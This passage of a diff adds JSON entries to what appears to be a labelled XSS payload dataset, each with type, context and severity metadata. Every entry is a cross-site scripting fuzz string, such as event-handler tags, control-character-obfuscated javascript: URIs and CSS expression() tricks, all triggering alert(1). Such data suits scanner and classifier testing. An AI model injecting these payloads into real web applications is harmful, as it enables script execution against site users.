"xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"></body onMouseEnter>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onFocus body onFocus=\"javascript:javascript:alert(1)\"></body onFocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<frameset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"></frameset onScroll>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"></script onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"></html onMouseUp>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"></body onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<svg onLoad svg onLoad=\"javascript:javascript:alert(1)\"></svg onLoad>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onPageHide body onPageHide=\"javascript:javascript:alert(1)\"></body onPageHide>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"></body onMouseOver>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onUnload body onUnload=\"javascript:javascript:alert(1)\"></body onUnload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onLoad body onLoad=\"javascript:javascript:alert(1)\"></body onLoad>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"></bgsound onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"></html onMouseLeave>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"></html onMouseWheel>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style onLoad style onLoad=\"javascript:javascript:alert(1)\"></style onLoad>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"></iframe onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onPageShow body onPageShow=\"javascript:javascript:alert(1)\"></body onPageShow>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"></style onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<frameset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"></frameset onFocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<applet onError applet onError=\"javascript:javascript:alert(1)\"></applet onError>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<marquee onStart marquee onStart=\"javascript:javascript:alert(1)\"></marquee onStart>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script onLoad script onLoad=\"javascript:javascript:alert(1)\"></script onLoad>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseOver html onMouseOver=\"javascript:javascript:alert(1)\"></html onMouseOver>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(1)\"></html onMouseEnter>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1)\"></body onBeforeUnload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseDown html onMouseDown=\"javascript:javascript:alert(1)\"></html onMouseDown>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<marquee onScroll marquee onScroll=\"javascript:javascript:alert(1)\"></marquee onScroll>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<xml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(1)\"></xml onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<frameset onBlur frameset onBlur=\"javascript:javascript:alert(1)\"></frameset onBlur>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<applet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1)\"></applet onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<svg onUnload svg onUnload=\"javascript:javascript:alert(1)\"></svg onUnload>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseOut html onMouseOut=\"javascript:javascript:alert(1)\"></html onMouseOut>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onMouseMove body onMouseMove=\"javascript:javascript:alert(1)\"></body onMouseMove>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onResize body onResize=\"javascript:javascript:alert(1)\"></body onResize>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<object onError object onError=\"javascript:javascript:alert(1)\"></object onError>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onPopState body onPopState=\"javascript:javascript:alert(1)\"></body onPopState>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"></html onMouseMove>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<applet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(1)\"></applet onreadystatechange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onpagehide body onpagehide=\"javascript:javascript:alert(1)\"></body onpagehide>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<svg onunload svg onunload=\"javascript:javascript:alert(1)\"></svg onunload>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<applet onerror applet onerror=\"javascript:javascript:alert(1)\"></applet onerror>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onkeyup body onkeyup=\"javascript:javascript:alert(1)\"></body onkeyup>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onunload body onunload=\"javascript:javascript:alert(1)\"></body onunload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe onload iframe onload=\"javascript:javascript:alert(1)\"></iframe onload>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onload body onload=\"javascript:javascript:alert(1)\"></body onload>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onmouseover html onmouseover=\"javascript:javascript:alert(1)\"></html onmouseover>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<object onbeforeload object onbeforeload=\"javascript:javascript:alert(1)\"></object onbeforeload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onbeforeunload body onbeforeunload=\"javascript:javascript:alert(1)\"></body onbeforeunload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onfocus body onfocus=\"javascript:javascript:alert(1)\"></body onfocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onkeydown body onkeydown=\"javascript:javascript:alert(1)\"></body onkeydown>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(1)\"></iframe onbeforeload>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<iframe src iframe src=\"javascript:javascript:alert(1)\"></iframe src>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<svg onload svg onload=\"javascript:javascript:alert(1)\"></svg onload>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<html onmousemove html onmousemove=\"javascript:javascript:alert(1)\"></html onmousemove>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<body onblur body onblur=\"javascript:javascript:alert(1)\"></body onblur>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\\x3Cscript>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "'\"`><script>/* *\\x2Fjavascript:alert(1)// */</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>javascript:alert(1)</script\\x0D", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>javascript:alert(1)</script\\x0A", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>javascript:alert(1)</script\\x0B", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script charset=\"\\x22>javascript:alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "`\"'><img src='#\\x27 onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javascript\\x3Ajavascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"'`><p><svg><script>a='hello\\x27;javascript:alert(1)//';</script></p>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x00cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x07cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x0Dcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x0Acript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x08cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x02cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x03cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x04cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x01cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x05cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x0Bcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x09cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x06cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"javas\\x0Ccript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>/* *\\x2A/javascript:alert(1)// */</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>/* *\\x00/javascript:alert(1)// */</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style></style\\x3E<img src=\"about:blank\" onerror=javascript:alert(1)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style></style\\x0D<img src=\"about:blank\" onerror=javascript:alert(1)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style></style\\x09<img src=\"about:blank\" onerror=javascript:alert(1)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style></style\\x20<img src=\"about:blank\" onerror=javascript:alert(1)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<style></style\\x0A<img src=\"about:blank\" onerror=javascript:alert(1)//></style>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"'`>ABC<div style=\"font-family:'foo'\\x7Dx:expression(javascript:alert(1);/*';\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"'`>ABC<div style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(1);/*';\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>if(\"x\\\\xE1\\x96\\x89\".length==2) { javascript:alert(1);}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>if(\"x\\\\xE0\\xB9\\x92\".length==2) { javascript:alert(1);}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script>if(\"x\\\\xEE\\xA9\\x93\".length==2) { javascript:alert(1);}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "\"'`><\\x00img src=xxx:x onerror=javascript:alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script src=\"data:text/plain\\x2Cjavascript:alert(1)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script src=\"data:\\xD4\\x8F,javascript:alert(1)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script src=\"data:\\xE0\\xA4\\x98,javascript:alert(1)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<script src=\"data:\\xCB\\x8F,javascript:alert(1)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert" + } + }, + { + "payload": "<a 